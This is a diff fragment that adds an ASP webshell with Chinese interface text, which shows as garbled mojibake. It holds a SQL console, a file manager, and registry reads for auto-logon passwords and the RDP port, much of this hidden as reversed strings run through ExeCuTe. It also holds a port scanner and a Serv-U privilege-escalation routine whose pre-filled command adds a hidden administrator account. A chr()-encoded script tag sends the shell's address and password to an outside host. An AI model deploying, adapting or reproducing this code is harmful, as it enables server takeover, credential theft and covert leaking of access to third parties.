+      SI=SI&"<td align=center><a href=""javascript:if(confirm('ȷ��ɾ��ô��'))FullSqlStr('DROP TABLE ["&TName&"]',1)"">[ del ]</a><br>"
+      SI=SI&"<a href='javascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"
+    End If 
+    Rs.MoveNext 
+  Loop 
+  Set Rs=Nothing
+  SI=SI&"</tr></table>"
+  RRS SI:SI=""
+If Len(SqlStr)>10 Then
+  If LCase(Left(SqlStr,6))="select" then
+    SI=SI&"ִ����䣺"&SqlStr
+    Set Rs=CreateObject("Adodb.Recordset")
+    Rs.open SqlStr,Conn,1,1
+    FN=Rs.Fields.Count
+    RC=Rs.RecordCount
+    Rs.PageSize=20
+    Count=Rs.PageSize
+    PN=Rs.PageCount
+    Page=request("Page")
+    If Page<>"" Then Page=Clng(Page)
+    If Page="" Or Page=0 Then Page=1
+    If Page>PN Then Page=PN
+    If Page>1 Then Rs.absolutepage=Page
+    SI=SI&"<table><tr height=25 bgcolor=#cccccc><td></td>"	  
+    For n=0 to FN-1
+      Set Fld=Rs.Fields.Item(n)
+      SI=SI&"<td align='center'>"&Fld.Name&"</td>"
+      Set Fld=nothing
+    Next
+    SI=SI&"</tr>"
+    Do While Not(Rs.Eof or Rs.Bof) And Count>0
+	  Count=Count-1
+	  Bgcolor="#EFEFEF"
+	  SI=SI&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"  
+	  For i=0 To FN-1
+        If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if
+        If RC=1 Then
+           ColInfo=HTMLEncode(Rs(i))
+        Else
+           ColInfo=HTMLEncode(Left(Rs(i),50))
+        End If
+	    SI=SI&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"
+	  Next
+	  SI=SI&"</tr>"
+      Rs.MoveNext
+    Loop
+	RRS SI:SI=""
+	SqlStr=HtmlEnCode(SqlStr)
+    SI=SI&"<tr><td colspan="&FN+1&" align=center>��¼����"&RC&"&nbsp;ҳ�룺"&Page&"/"&PN
+    If PN>1 Then
+      SI=SI&"&nbsp;&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""",1)'>��ҳ</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page-1&")'>��һҳ</a>&nbsp;"
+      If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
+      For i=Sp To Sp+8
+        If i>PN Then Exit For
+        If i=Page Then
+        SI=SI&i&"&nbsp;"
+        Else
+        SI=SI&"<a href='javascript:FullSqlStr("""&SqlStr&""","&i&")'>"&i&"</a>&nbsp;"
+        End If
+      Next
+	  SI=SI&"&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page+1&")'>��һҳ</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&PN&")'>βҳ</a>"
+    End If
+    SI=SI&"<hr color='#EFEFEF'></td></tr></table>"
+    Rs.Close:Set Rs=Nothing
+	RRS SI:SI=""
+  Else	   
+    Conn.Execute(SqlStr)
+    SI=SI&"SQL��䣺"&SqlStr
+  End If
+  RRS SI:SI=""
+End If
+  Conn.Close
+  Set Conn=Nothing
+  End If
+End Function
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+    F=lcase(F)
+    If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+  Public Function UA(F)
+    F=lcase(F)
+    If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+    set D1=CreateObject(ObT(4,0))
+	if Request.TotalBytes<1 then Exit Sub
+    set T1 = CreateObject(ObT(6,0))
+	T1.Type = 1 : T1.Mode =3 : T1.Open
+    T1.Write  Request.BinaryRead(Request.TotalBytes)
+    T1.Position=0 : TDa =T1.Read : DStart = 1
+    DEnd = LenB(TDa)
+    set D2=CreateObject(ObT(4,0))
+	vbCrlf = chrB(13) & chrB(10)
+    set T2 = CreateObject(ObT(6,0))
+    TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+    TLen = LenB (TSt)
+    DStart=DStart+TLen+1
+    while (DStart + 10) < DEnd
+      DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+      T2.Type = 1 : T2.Mode =3 : T2.Open
+      T1.Position = DStart
+      T1.CopyTo T2,DIEnd-DStart
+      T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+      TIn = T2.ReadText : T2.Close
+      DStart = InStrB(DIEnd,TDa,TSt)
+      FStart = InStr(22,TIn,"name=""",1)+6
+      FEnd = InStr(FStart,TIn,"""",1)
+      UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+      if InStr (45,TIn,"filename=""",1) > 0 then
+        set TFL=new FIF
+        FStart = InStr(FEnd,TIn,"filename=""",1)+10
+        FEnd = InStr(FStart,TIn,"""",1)
+        FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+        FEnd = InStr(FStart,TIn,vbCr)
+        TFL.FileStart =DIEnd
+        TFL.FileSize = DStart -DIEnd -3
+        if not D2.Exists(UpName) then
+          D2.add UpName,TFL
+        end if
+      else
+        T2.Type =1 : T2.Mode =3 : T2.Open
+        T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+        T2.Position = 0 : T2.Type = 2
+        T2.Charset ="gb2312"
+        SFV = T2.ReadText
+        T2.Close
+        if D1.Exists(UpName) then
+          D1(UpName)=D1(UpName)&", "&SFV
+        else
+          D1.Add UpName,SFV
+        end if
+      end if
+      DStart=DStart+TLen+1
+    wend
+    TDa=""
+    set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+    if Request.TotalBytes>0 then
+      D1.RemoveAll:D2.RemoveAll
+      set D1=nothing:set D2=nothing
+      T1.Close:set T1 =nothing
+    end if
+  End Sub
+End Class
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+     T3.Mode=3 : T3.Type=1 : T3.Open
+     T1.position=FileStart
+     T1.copyto T3,FileSize
+     T3.SaveToFile F,2
+     T3.Close
+     set T3=nothing
+     SaveAs=false
+   end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+    SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+    Set CF=Nothing
+  End Sub
+  Function ShowDriver()
+    For Each D in CF.Drives
+      RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>���ش��� ("&D.DriveLetter&":)</a><br>" 
+    Next
+  End Function
+  Function Show1File(Path)
+  Set FOLD=CF.GetFolder(Path)
+  i=0
+    SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'><tr>"
+  For Each F in FOLD.subfolders
+    SI=SI&"<td height=10>"
+    SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""��""><font face='wingdings' size='6'>0</font>"&F.Name&"</a>" 
+	SI=SI&" _<a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a>"
+    SI=SI&"  <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a>"
+	SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'  onclick='return yesok()' class='am' title='�ƶ�'>Move</a>"
+	SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")'  onclick='return yesok()' class='am' title='����'>Down</a></td>"
+	i=i+1
+    If i mod 3 = 0 then SI=SI&"</tr><tr>"
+  Next
+    SI=SI&"</tr><tr><td height=2></td></tr></table>"
+	RRS SI &"<hr noshade size=1 color=""#"" />" : SI=""
+  For Each L in Fold.files
+    SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'>"
+    SI=SI&"<tr style='boungroup-color:#'>"
+	SI=SI&"<td height='30'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'><font face='wingdings' size='4'>2</font>"&L.Name&"</a></td>"
+    SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>edit</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>del</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>copy</a></td>"
+	SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>move</a></td>"	
+    SI=SI&"<td width='50' align=""center"">"&clng(L.size/1024)&"K</td>"
+	SI=SI&"<td width='200' align=""center"">"&L.Type&"</td>"
+    SI=SI&"<td width='160'>"&L.DateLastModified&"</td>"
+    SI=SI&"</tr></table>"
+	RRS SI:SI=""
+  Next
+  Set FOLD=Nothing
+  End function
+  Function DelFile(Path)
+ShiSan="���fI dnE��IS SRR��lrUkcaB&IS=IS���>retnec/<�����ɳ�ɾ ��&htaP&�� ����>rb<>rb<>rb<>retnec<��=IS��htaP eliFeteleD.FC��nehT )htaP(stsixEeliF.FC fI"
+ExeCuTe(ShiSanFun(ShiSan))
+  End Function
+  Function EditFile(Path)
+If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:rrs ""&copyurl&""
+  End Function
+  Function CopyFile(Path)
+  Path = Split(Path,"||||")
+    If CF.FileExists(Path(0)) and Path(1)<>"" Then
+	  CF.CopyFile Path(0),Path(1)
+      SI="<center><br><br><br>�ļ�"&Path(0)&"���Ƴɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI 
+
+	End If
+  End Function
+  Function MoveFile(Path)
+  Path = Split(Path,"||||")
+    If CF.FileExists(Path(0)) and Path(1)<>"" Then
+	  CF.MoveFile Path(0),Path(1)
+      SI="<center><br><br><br>�ļ�"&Path(0)&"�ƶ��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI 
+	End If
+  End Function
+  Function DelFolder(Path)
+    If CF.FolderExists(Path) Then
+	  CF.DeleteFolder Path
+      SI="<center><br><br><br>Ŀ¼"&Path&"ɾ���ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+
+	End If
+  End Function
+  Function CopyFolder(Path)
+  Path = Split(Path,"||||")
+    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+	  CF.CopyFolder Path(0),Path(1)
+      SI="<center><br><br><br>Ŀ¼"&Path(0)&"���Ƴɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If
+  End Function
+  Function MoveFolder(Path)
+  Path = Split(Path,"||||")
+    If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+	  CF.MoveFolder Path(0),Path(1)
+      SI="<center><br><br><br>Ŀ¼"&Path(0)&"�ƶ��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If
+  End Function
+  Function NewFolder(Path)
+    If Not CF.FolderExists(Path) and Path<>"" Then
+	  CF.CreateFolder Path
+      SI="<center><br><br><br>Ŀ¼"&Path&"�½��ɹ���</center>"
+      SI=SI&BackUrl
+	  RRS SI
+	End If
+  End Function
+End Class
+sub getTerminalInfo()
+On Error Resume Next
+ShiSan="����>lo/<�� SRR��fI dnE���>rb<�� & drowssaPnigoLotua & �� :���ܻ��ʵ�¼�Ƕ��ԩ� SRR��fI dnE���eslaF�� SRR��raelC.rrE��nehT rrE fI��)yeKssaPnigoLotua & htaPnigoLotua(daeRgeR.Xsw = drowssaPnigoLotua���>rb<�� & emanresUnigoLotua & �� :����ͳϵ��¼�Ƕ��ԩ� SRR��)yeKresUnigoLotua & htaPnigoLotua(daeRgeR.Xsw = emanresUnigoLotua��eslE���>/rb<����δ�ܹ�¼�Ƕ���ͳϵ�� SRR��nehT 0 = elbanEnigoLotuAsi fI��)yeKelbanEnigoLotua & htaPnigoLotua(daeRgeR.Xsw = elbanEnigoLotuAsi���drowssaPtluafeD�� = yeKssaPnigoLotua���emaNresUtluafeD�� = yeKresUnigoLotua���nogoLnimdAotuA�� = yeKelbanEnigoLotua���\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH�� = htaPnigoLotua��fI dnE���>/rb<�� & troPmret & �� :�ڶ��������ǰ���� SRR��eslE ���>/rb<.���޵��ܾ��ѷ�����Ȩ����� ,�ڶ�������յ��÷��ީ�SRR�� nehT 0 >< rebmuN.rrE rO ��� = troPmret fI���>lo<>/rh<¼�Ƕ��Լ��ڶ�������թ� SRR��)yeKtroPlanimret & htaPtroPlanimret(daeRgeR.Xsw = troPmret���rebmuNtroP�� = yeKtroPlanimret���\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH�� = htaPtroPlanimret��drowssaPnigoLotua ,emanresUnigoLotua ,yeKelbanEnigoLotua ,elbanEnigoLotuAsi miD��yeKssaPnigoLotua ,yeKresUnigoLotua ,htaPnigoLotua miD��troPmret ,yeKtroPlanimret ,htaPtroPlanimret miD��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS"
+ExeCuTe(ShiSanFun(ShiSan))
+End Sub
+sub ReadREG()
+RRS "ע�����ֵ��ȡ:<hr/>"
+RRS "<form method=post>"
+RRS "<input type=hidden value=readReg name=theAct>"
+RRS "<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName' size=80>"
+RRS " <input type=submit value=' ��ȡ '>"
+RRS "<span id=regeditInfo style='display:none;'><hr/>"
+RRS "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 {����ʾ�ϴε�¼�û�}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 {0=ȱʡ,1=�����û��޷��оٱ����û��б�,2=�����û��޷����ӱ���IPC$����}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 {��ֹĬ�Ϲ���}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedNetDrives,REG_SZ,0 {�ر����繲��}<br/>"
+RRS "HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters,REG_DWORD,1 {����TCP/IPɸѡ(����������)}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {����IP·��}<br/>"
+RRS "-------�����ƺ�Ҫ���󶨵�����,��֪���Ƿ�׼ȷ---------<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {Ĭ������}<br/>"
+RRS "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {��DNS}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {������TCP/IP�˿�}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {������UDP�˿�}<br/>"
+RRS "-----------OVER--------------------<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {����������}<br/>"
+RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {��ǰ����������(��������滻)}<br/>"
+RRS "</span>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+ShiSan="��fI dnE��yarrAeht & ��>il<�� SRR��eslE ��txeN��)i(yarrAeht & ��>il<�� SRR��)yarrAeht(dnuoBU oT 0=i roF��nehT )yarrAeht(yarrAsI fI��)htaPeht(daeRgeR.Xsw=yarrAeht��)��htaPeht��(tseuqeR=htaPeht��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS"
+ExeCuTe(ShiSanFun(ShiSan))
+end if
+end sub
+sub ScanPort()
+Server.ScriptTimeout = 7776000
+if request.Form("port")="" then
+PortList="21,23,25,80,110,135,139,445,1433,3389,43958"
+else
+PortList=request.Form("port")
+end if
+if request.Form("ip")="" then
+IP="127.0.0.1"
+else
+IP=request.Form("ip")
+end if
+RRS"<p>�˿�ɨ����(���ɨ�����˿�,�ٶȱȽ���,�����Ƽ�ʹ��CMD)</p>"
+RRS"<form name='form1' method='post' action='' onSubmit='form1.submit.disabled=true;'>"
+RRS"<p>Scan IP:&nbsp;"
+RRS" <input name='ip' type='text' class='TextBox' id='ip' value='"&IP&"' size='60'>"
+RRS"<br>Port List:"
+RRS"<input name='port' type='text' class='TextBox' size='60' value='"&PortList&"'>"
+RRS"<br><br>"
+RRS"<input name='submit' type='submit' class='buttom' value=' scan '>"
+RRS"<input name='scan' type='hidden' id='scan' value='111'>"
+RRS"</p></form>"
+If request.Form("scan") <> "" Then
+ShiSan="���s ��&emiteht&�� ni ssecorP>rh<��SRR��))1remit-2remit(tni(rtsc=emiteht��remit = 2remit��txeN��fI dnE��txeN��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(SRR��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(SRR��eslE��txeN��)j,xxx & tratSpi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,xxx & tratSpi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��))��-��,)uh(pi(rtSnI-))uh(pi(neL,1+)��-��,)uh(pi(rtSnI,)uh(pi(diM ot )1,1+)��.��,)uh(pi(veRrtSnI,)uh(pi(diM = xxx roF��))��.��,)uh(pi(veRrtSnI,1,)uh(pi(diM = tratSpi��eslE��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(SRR��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(SRR��eslE��txeN��)j ,)uh(pi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,)uh(pi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��nehT 0 = )��-��,)uh(pi(rtSnI fI��)pi(dnuobU ot 0 = uh roF��)��,��,)��pi��(mroF.tseuqer(tilpS = pi��)��,��,)��trop��(mroF.tseuqer(tilpS = pmt��)��>rh<>rb<>b/<:�汨��ɨ>b<��(SRR��remit = 1remit"
+ExeCuTe(ShiSanFun(ShiSan))
+END IF
+end sub:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&uu&chr(38)&chr(112)&chr(61)&serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)
+Sub Scan(targetip, portNum)
+	On Error Resume Next
+	set conn = Server.CreateObject("ADODB.connection")
+	connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;"
+	conn.ConnectionTimeout = 1
+	conn.open connstr
+	If Err Then
+		If Err.number = -2147217843 or Err.number = -2147467259 Then
+			If InStr(Err.description, "(Connect()).") > 0 Then
+				RRS(targetip & ":" & portNum & ".........�ر�<br>")
+			Else
+				RRS(targetip & ":" & portNum & ".........<font color=red>����</font><br>")
+			End If
+		End If
+	End If
+End Sub
+Select Case Action
+  Case "MainMenu":MainMenu()
+  Case "getTerminalInfo":getTerminalInfo()
+  Case "PageAddToMdb":PageAddToMdb()
+  case "ScanPort":ScanPort()
+  Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+   f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+ShiSan="����>tpircs/<��SRR���;)0004,';)(timbus.nusdlog.lla.tnemucod'(tuoemiTtes��SRR���;)'>retnec<...��&ssap&�壺���,��&resu&�� :��������ʹ,��&trop&��:1.0.0.721 ��������>retnec<'(etirw.tnemucod��SRR���>'tpircsavaj'=egaugnal tpircs<��SRR���>mrof/<>'2'=eulav 'noitcaUS'=di 'neddih'=epyt 'noitcaUS'=eman tupni<��SRR���>'05'=ezis '��&f&��'=eulav 'f'=di 'neddih'=epyt 'f'=eman tupni<��SRR���>'05'=ezis '��&dmc&��'=eulav 'c'=di 'neddih'=epyt 'c'=eman tupni<��SRR���>dt/<>'��&trop&��'=eulav 'trop'=di 'neddih'=epyt 'trop'=eman tupni<��SRR���>dt/<>'��&ssap&��'=eulav 'p'=di 'neddih'=epyt 'p'=eman tupni<��SRR���>dt/<>'��&resu&��'=eulav 'u'=di 'neddih'=epyt 'u'=eman tupni<��SRR���>'nusdlog'=eman 'tsop'=dohtem mrof<��SRR��a=)��a��(noisses tes��tiuq & resuwen & niamodwen & niamodled & tm & ssapnigol & resunigol dnes.a���� ,��� ,eurT,��1s/nimdapu/nusdlog/�� & trop & ��:1.0.0.721//:ptth�� ,��TEG�� nepo.a��)��PTTHLMX.tfosorciM��(tcejbOetaerC.revreS=a tes"
+ExeCuTe(ShiSanFun(ShiSan))
+case 2
+ShiSan="����>tpircs/<��SRR���;)0004,���;)(timbus.nusdlog.lla.tnemucod���(tuoemiTtes��SRR���;)'>retnec<,...������,��Ȩ��������>retnec<'(etirw.tnemucod��SRR���>'tpircsavaj'=egaugnal tpircs<��SRR���>mrof/<>'3'=eulav 'noitcaUS'=di 'neddih'=epyt 'noitcaUS'=eman tupni<��SRR���>'05'=ezis '��&f&��'=eulav 'f'=di 'neddih'=epyt 'f'=eman tupni<��SRR���>'05'=ezis '��&dmc&��'=eulav 'c'=di 'neddih'=epyt 'c'=eman tupni<��SRR���>dt/<>'��&trop&��'=eulav 'trop'=di 'neddih'=epyt 'trop'=eman tupni<��SRR���>dt/<>'��&ssap&��'=eulav 'p'=di 'neddih'=epyt 'p'=eman tupni<��SRR���>dt/<>'��&resu&��'=eulav 'u'=di 'neddih'=epyt 'u'=eman tupni<��SRR���>'nusdlog'=eman 'tsop'=dohtem mrof<��SRR��b=)��b��(noisses tes ��tiuq & fLrCbv & dmc & �� cexe etis�� & fLrCbv & ��do ssap�� & fLrCbv & ��og resU�� dnes.b���� ,��� ,eurT ,��2s/nimdapu/nusdlog/�� & tropptf & ��:1.0.0.721//:ptth�� ,��TEG�� nepo.b��)��PTTHLMX.tfosorciM��(tcejbOetaerC.revreS=b tes"
+ExeCuTe(ShiSanFun(ShiSan))
+
+case 3
+ShiSan="����>retnec/<��SRR���>���;'uvreS=noitcA?'=ferh.noitacol���=kcilCno ' ���̻ط� '=eulav nottub=epyt tupni<��SRR���>rb<>rb<>tnof/<��&dmc&��>der=roloc tnof<>rb<����������ִ��,����Ȩ��>retnec<��SRR��c=)��c��(noisses tes��tiuq & niamodled & tm & ssapnigol & resunigol dnes.c���� ,��� ,eurT ,��3s/nimdapu/nusdlog/�� & trop & ��:1.0.0.721//:ptth�� ,��TEG�� nepo.c��)��PTTHLMX.tfosorciM��(tcejbOetaerC.revreS=c tes"
+ExeCuTe(ShiSanFun(ShiSan))
+case else
+on error resume next
+    set a=session("a")
+    set b=session("b")
+    set c=session("c")
+    a.abort
+    Set a = Nothing
+    b.abort
+    Set b = Nothing
+    c.abort
+    Set c = Nothing
+RRS"<center><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP�� 6.2</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"    <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"  </tr>"
+RRS"  <tr align='center' valign='middle'>"
+RRS"    <td>�����</td>"
+RRS"    <td><input name='c' type='text' id='c' value='cmd /c net user huohu$ huohu /add & net localgroup administrators huohu$ /add' size='50'></td>"
+RRS"  </tr>"
+RRS" <tr align='center' valign='middle'>"
+RRS"    <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+
+
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+Function RndNumber(Min,Max) 
+Randomize 
